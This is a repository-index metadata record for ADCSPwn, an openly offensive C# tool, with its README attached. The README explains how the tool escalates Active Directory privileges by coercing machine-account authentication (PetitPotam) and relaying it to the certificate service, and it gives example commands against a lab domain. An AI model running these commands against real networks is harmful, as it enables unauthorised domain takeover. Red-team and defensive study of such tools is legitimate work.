{"id":13840982,"url":"https://github.com/bats3c/ADCSPwn","last_synced_at":"2025-07-11T10:30:36.960Z","repository":{"id":47948380,"uuid":"391104231","full_name":"bats3c/ADCSPwn","owner":"bats3c","description":"A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.","archived":false,"fork":false,"pushed_at":"2023-03-20T20:30:40.000Z","size":6258,"stargazers_count":816,"open_issues_count":2,"forks_count":122,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-11-19T05:59:33.674Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bats3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-30T15:04:41.000Z","updated_at":"2024-10-14T04:36:56.000Z","dependencies_parsed_at":"2024-05-07T00:45:54.771Z","dependency_job_id":null,"html_url":"https://github.com/bats3c/ADCSPwn","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bats3c","download_url":"https://codeload.github.com/bats3c/ADCSPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712959,"owners_count":17512523,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:00.884Z","updated_at":"2024-11-21T10:31:11.112Z","avatar_url":"https://github.com/bats3c.png","language":"C#","readme":"# ADCSPwn\n\nA tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.\n\n## Usage\n\nRun `ADCSPwn` on your target network.\n\n```\nAuthor: @_batsec_ - MDSec ActiveBreach\nContributor: @Flangvik -  TrustedSec\nContributor: @424f424f -  Black Hills Information Security\n\nadcspwn.exe --adcs \u003ccs server\u003e --port [local port] --remote [computer]\n\nRequired arguments:\nadcs            -       This is the address of the AD CS server which authentication will be relayed to.\n\nOptional arguments:\nsecure          -       Use HTTPS with the certificate service.\nport            -       The port ADCSPwn will listen on.\nremote          -       Remote machine to trigger authentication from.\nusername        -       Username for non-domain context.\npassword        -       Password for non-domain context.\ndc              -       Domain controller to query for Certificate Templates (LDAP).\nunc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .\noutput          -       Output path to store base64 generated crt.\n\nExample usage:\nadcspwn.exe --adcs cs.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --secure\nadcspwn.exe --adcs cs.pwnlab.local --port 9001\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\\Temp\\cert_b64.txt\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\\mranderson --password The0nly0ne! --dc dc.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\\\WIN-WORK01.pwnlab.local\\made\\up\\share\n```\n\n## Credits\n\n- [@harmj0y](https://twitter.com/harmj0y) \u0026 [@tifkin_](https://twitter.com/tifkin_) for their [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) detailing this issue.\n- [@topotam77](https://twitter.com/topotam77) for showing how `EfsRpcOpenFileRaw` can be abused.\n","funding_links":[],"categories":["C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbats3c%2FADCSPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbats3c%2FADCSPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbats3c%2FADCSPwn/lists"}